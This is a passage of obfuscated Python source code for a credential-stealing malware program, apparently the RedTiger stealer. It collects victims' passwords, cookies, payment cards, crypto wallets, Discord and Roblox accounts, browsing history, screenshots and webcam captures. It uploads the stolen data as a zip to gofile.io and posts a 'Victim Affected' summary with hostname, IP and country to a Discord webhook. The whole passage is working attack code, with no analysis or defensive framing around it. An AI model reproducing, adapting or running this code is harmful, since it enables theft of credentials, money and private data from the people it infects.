        HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_camera_capture = f"Error: {e}"

    try: 
        HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_screenshot = FGVXUEYARKIMXGDLVVGHGPFSOVPZZFEVTXHDPHDVWKGHDSQIAGMTC(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD)
    except Exception as e:
        HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_screenshot = f"Error: {e}"

    try: 
        JWQIPBSQNSXPODJVPBTIPTCBRQBISNGHTVQWMDQHZIDPUIYIEEROLCEGIPMJKILTNUOWJPGKO, MVBKTNZVQVAKTMBBZPARZRYRWGQYTIVIBCWJAEQOJOLQYNHEFUBLPODWPKKQJAGGCIPHPIGGL, JGGPLRKFCXJOMHMSNGPAOBVSDXTXRUDMONUQFDWIVVVDHTJDSMEVNZKPIJKQLDNKJDLEXOSHCEGIEMLTXUKQTSPVKHCOZHXDH = WYZPBLULYBFWVXHMJWGSOJIEQMJOCKGNJEEJUEIBPODMAFAQQGSDFUJCEIYSHJXOWRXXLOLPITKDAKIYQZCESQ(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD)
    except Exception as e:
        HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_screenshot = f"Error: {e}"

    try: 
        GDNDHWHIYORQHGJXLBYUMNSXZJOWCBRZSMPSBMMXQWGIHUSKSNEZBRRIVIPIVOSIFQQNVFSMDJSPHYYA = TTAQRGYSNDFXMJYEROTKHANLIJUKRJBHZTCHZJQCYXRXDENOMKNLWFYTFUGFESICGWYZGJBAJHDJP(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD)
    except Exception as e:
        GDNDHWHIYORQHGJXLBYUMNSXZJOWCBRZSMPSBMMXQWGIHUSKSNEZBRRIVIPIVOSIFQQNVFSMDJSPHYYA = f"Error: {e}"

    if HAOVZJMOWXECWQFFMPQLPSEXOJVJVKEIZMUWHNKPBKZSVJDWUSHRZVWJYXITPIZBPIATE != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Discord Injection : {HAOVZJMOWXECWQFFMPQLPSEXOJVJVKEIZMUWHNKPBKZSVJDWUSHRZVWJYXITPIZBPIATE}")

    if HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_camera_capture != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Camera Capture    : {HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_camera_capture}")

    if HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_screenshot != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Screenshot        : {HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_screenshot}")

    if HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_system_info != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"System Info       : {HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_system_info}")

    if SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Discord Accounts  : {SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY}")

    if ZSIRONJCJZMWMECOQKEMDGZRMTQPLRRIWGINIUGEEBOGIALUSQGVPKGSKHCVTL != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Roblox Accounts   : {ZSIRONJCJZMWMECOQKEMDGZRMTQPLRRIWGINIUGEEBOGIALUSQGVPKGSKHCVTL}")

    if RPFYVOWIVYIEBFBYLBQQUFLPRCGFRSIKAEAMGGSYUAASFJOMBOWRKYYMBQDHHVHPFNVIX != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Passwords         : {RPFYVOWIVYIEBFBYLBQQUFLPRCGFRSIKAEAMGGSYUAASFJOMBOWRKYYMBQDHHVHPFNVIX}")

    if HVNCSTIRHDVFALETMTKYDVXEFUKSABPTWBGLZGWCKTBHPRAGSGRVFDMYSPDKZSRGHJQXNIMCXPS != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Cookies           : {HVNCSTIRHDVFALETMTKYDVXEFUKSABPTWBGLZGWCKTBHPRAGSGRVFDMYSPDKZSRGHJQXNIMCXPS}")

    if ATJQNUCVALRAUPTRJFHBAFEZRWEKEWBXNCHRGWSXLVXFVWZVJBXVAIPLJRXFVXYEVDGQTZYEQXSFDHPJFRO != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Cards             : {ATJQNUCVALRAUPTRJFHBAFEZRWEKEWBXNCHRGWSXLVXFVWZVJBXVAIPLJRXFVXYEVDGQTZYEQXSFDHPJFRO}")

    if HFGUVHTXCHAEOCHEOKWQGCUIPNYAHIIUCOAEPSNTBYIQYIELAJSKRPAWFSJUZXFFARQSLYKB != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Browsing History  : {HFGUVHTXCHAEOCHEOKWQGCUIPNYAHIIUCOAEPSNTBYIQYIELAJSKRPAWFSJUZXFFARQSLYKB}")

    if YZINSDQVFUIYGQMYNKTYBTXHYLTOZHVJHEKDJLHHJQYFHNVGGWRZSCMCMKJAQVUPWNVQLNWJQAVWLPDJGREHRTZUEQBSFY != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Download History  : {YZINSDQVFUIYGQMYNKTYBTXHYLTOZHVJHEKDJLHHJQYFHNVGGWRZSCMCMKJAQVUPWNVQLNWJQAVWLPDJGREHRTZUEQBSFY}")

    if YHJNIVWXKWYIIBYVHJTZRRUNWBBOEVVCXUGDBHNQDKXDIVEMKPMMMUH != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Extentions        : {YHJNIVWXKWYIIBYVHJTZRRUNWBBOEVVCXUGDBHNQDKXDIVEMKPMMMUH}")

    if JWQIPBSQNSXPODJVPBTIPTCBRQBISNGHTVQWMDQHZIDPUIYIEEROLCEGIPMJKILTNUOWJPGKO != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Wallets           : {JWQIPBSQNSXPODJVPBTIPTCBRQBISNGHTVQWMDQHZIDPUIYIEEROLCEGIPMJKILTNUOWJPGKO}")

    if MVBKTNZVQVAKTMBBZPARZRYRWGQYTIVIBCWJAEQOJOLQYNHEFUBLPODWPKKQJAGGCIPHPIGGL != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Game Launchers    : {MVBKTNZVQVAKTMBBZPARZRYRWGQYTIVIBCWJAEQOJOLQYNHEFUBLPODWPKKQJAGGCIPHPIGGL}")
    
    if JGGPLRKFCXJOMHMSNGPAOBVSDXTXRUDMONUQFDWIVVVDHTJDSMEVNZKPIJKQLDNKJDLEXOSHCEGIEMLTXUKQTSPVKHCOZHXDH != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Apps              : {JGGPLRKFCXJOMHMSNGPAOBVSDXTXRUDMONUQFDWIVVVDHTJDSMEVNZKPIJKQLDNKJDLEXOSHCEGIEMLTXUKQTSPVKHCOZHXDH}")
    
    if GDNDHWHIYORQHGJXLBYUMNSXZJOWCBRZSMPSBMMXQWGIHUSKSNEZBRRIVIPIVOSIFQQNVFSMDJSPHYYA != None:
        YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST.append(f"Interesting Files : {GDNDHWHIYORQHGJXLBYUMNSXZJOWCBRZSMPSBMMXQWGIHUSKSNEZBRRIVIPIVOSIFQQNVFSMDJSPHYYA}")

GPYKYMFEVOAECAJZHTWRAAZCKOPCQXHNPOZGTSFGQJDAIXQTVEXEGNIKCTSSZMDJPPFERAIGHLYHYJSUAEDTLTASGETPSKIAPX.seek(0)

try:
    try: XSWULQSFWWYRUFUQGTNYGZHNUVVCPOFSHQZNUSSNJOJYBVQJGQCPZXHKYJ = loads(urlopen("https://api.gofile.io/getServer").read().decode('utf-8'))["data"]["server"]
    except: XSWULQSFWWYRUFUQGTNYGZHNUVVCPOFSHQZNUSSNJOJYBVQJGQCPZXHKYJ = "store4"

    TGVEBHDSNXQSYVTZALYTPFIFKNOFGRNKVADCUSWDSQVOCTZEFREARMFZGBBJTIKBVEPXROXZDHJCKMNWDLPRSRG = requests.post(
        f"https://{XSWULQSFWWYRUFUQGTNYGZHNUVVCPOFSHQZNUSSNJOJYBVQJGQCPZXHKYJ}.gofile.io/uploadFile",
        files={"file": (f"RedTiger_{ULNYRBBLQSGHOGDXOQUHIGLAXMGBBKFUWQYVVZXYEAQKQBXLRUCERYEWRIIHIHZXGFYLGJGCZBXMAWVKZF.replace(' ', '_')}.zip", GPYKYMFEVOAECAJZHTWRAAZCKOPCQXHNPOZGTSFGQJDAIXQTVEXEGNIKCTSSZMDJPPFERAIGHLYHYJSUAEDTLTASGETPSKIAPX)}
    )

    NFJBWRBPNNMIEPCGJDNDIMXBTAKKWJEVMFVNNYNRGQABDVPRKOMTFWWRZWMDWBWOHBXUTIADUUHAPPQBMSPKDPNUWQOLHFJADBX = TGVEBHDSNXQSYVTZALYTPFIFKNOFGRNKVADCUSWDSQVOCTZEFREARMFZGBBJTIKBVEPXROXZDHJCKMNWDLPRSRG.json()["data"]["downloadPage"]
except Exception as e:
    NFJBWRBPNNMIEPCGJDNDIMXBTAKKWJEVMFVNNYNRGQABDVPRKOMTFWWRZWMDWBWOHBXUTIADUUHAPPQBMSPKDPNUWQOLHFJADBX = f"Error: {e}"

embed = discord.Embed(title="Victim Affected", color=OIXHTAUFJGUVCWCAWPVGEKOZSSDEWIQLHAPGNQTEMJBKBOTSOTYCIAILHIKFIWACN
).add_field(
    inline=False,
    name="Summary of Information", 
    value=f"""```
Hostname    : {DNCRQGYAVNZCFUVDLLUUPMEAVXXJPOYKWZRKXTGKGPURFPZFKBNESGGIWJPGAIWKRSTTRZOQGKLPBZNQYIVGVI}
Username    : {ULNYRBBLQSGHOGDXOQUHIGLAXMGBBKFUWQYVVZXYEAQKQBXLRUCERYEWRIIHIHZXGFYLGJGCZBXMAWVKZF}
DisplayName : {LTQUKIQQANBEFIGMVVRURAZUZDMHOSQTURWBDGVRVJIVTSDZAFFHRMPVKDOTVTQCOEUWQWECH}
Ip Public   : {ZAGNRWRFUHPYZVRJGARXWJCOHJTGBBUFCWHSKBFEGSUIVYGZDWU}
Ip Local    : {SXSGNHILKSGMLFWLPQZCZMUJQJACCNLXJVPDIJPACMAKERJPAPMBKHNKLB}
Country     : {AYXXHMZGQTZCWWKHEZDNJEFIVTDXVEYKHPNKDNKMMUTDUMHMDAZVAOGUKIPBP}```"""
).add_field(
    inline=False,
    name="Stolen Information", 
    value=f"""```swift
{"\n".join(YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST)}```"""
).add_field(
    inline=False,
    name="Download Link", 
    value=f"""{NFJBWRBPNNMIEPCGJDNDIMXBTAKKWJEVMFVNNYNRGQABDVPRKOMTFWWRZWMDWBWOHBXUTIADUUHAPPQBMSPKDPNUWQOLHFJADBX}"""
).set_footer(
    text=RPORGOBBIGEBMBIITQLQBTIYYBCMXVRSOBCOIGGGJYBRPZGPSIFJMFHIVSPDAHOVMIWCUHJZIKIUNNTQYMY, 
    icon_url=SRHEAGZRWTHFGBKQCZCETYILHAEYKEPVMVQKEQIKKZOTMZOJDEY
)

try:  
    JASVYWSBZTFODNWSFAGOAMQFYRJAEAMPKQQSYQHZPXBGPWHPUZHYXBQJTFBJSDLIHAPIYAQ = discord.SyncWebhook.from_url(WUCIVKPIRRPVMERPUMTJFBJVXPEUEHDAIBOIDVVEXCBFZTTOCXUYVIDRZFZCMBBA)
    JASVYWSBZTFODNWSFAGOAMQFYRJAEAMPKQQSYQHZPXBGPWHPUZHYXBQJTFBJSDLIHAPIYAQ.send(embed=embed, username=WXZIPDFEWMSTKLZYUXAIHLCBLECHWFCMCYRXYICXCCHHLJFRJZPRRLCNKECBCOVFJFFM, avatar_url=SRHEAGZRWTHFGBKQCZCETYILHAEYKEPVMVQKEQIKKZOTMZOJDEY)
except: pass


try: threading.Thread(target=AZUWCOIFFRVCJXUDCUOZFAYZIRJBSWRPZHGSYOFJEAVKINXMSGXICMQBLKVAOCIUGUHRMBTIFXGOUXARAIFQHFUQWNMBECTQ).start()
except: pass
try: threading.Thread(target=FNQKJUKCCOAECIDNWZSITGFJIWUEYBXOJNGPNHRUNILRBFYGEWPJLPKHIVANGZH).start()
except: pass
try: threading.Thread(target=FXWCREEAAPXANHZTUGCAGKZRLVCHMBIKRBUMDCSHHEUHCBPONLVGETVDYBXLPEQIWCTTGCAXKHDPUPYQQZ).start()
except: pass
try: threading.Thread(target=XUPQSFIUQYKBELCTIRPJFUCHMEAJDUMVVOFQMLFHDIUAOVBBTWYTLTQMOXLXIQXGFQTXSYPBWXTTFOKS).start()
except: pass
try: threading.Thread(target=FLRPPLFLQBYJKGUDOIYESUPXLAKCIQLMHHRENMKVAQHLCRLMRCZJJDVWVWLFLEXG).start()
except: pass
try: threading.Thread(target=VMYZBIYPVCXWJWMTEDICAZWXOHUFHKERFIDNOMFRTWYLOPRUFQVZOUKHSBJBTLWURXRKAQQKJDNINIIWAK).start()
except: pass
try: threading.Thread(target=XOFIGIYZUOFZXBKPMTALYLVXYTYJHLPXGXYFLAVGNDJIEICLENITEBLHMGPDXNIVWJVMCNOONDSWEZBPUYCGCBBMP).start()
except: pass
try: threading.Thread(target=XIMSHQKDOVFQCMVRNETWVRUJQESOKLAACCIMSQWTPQHTHOYSNKXZVYRZOGSQPMDTTEGAQWOCSBCBZPVKVNQJZNZT).start()
except: pass
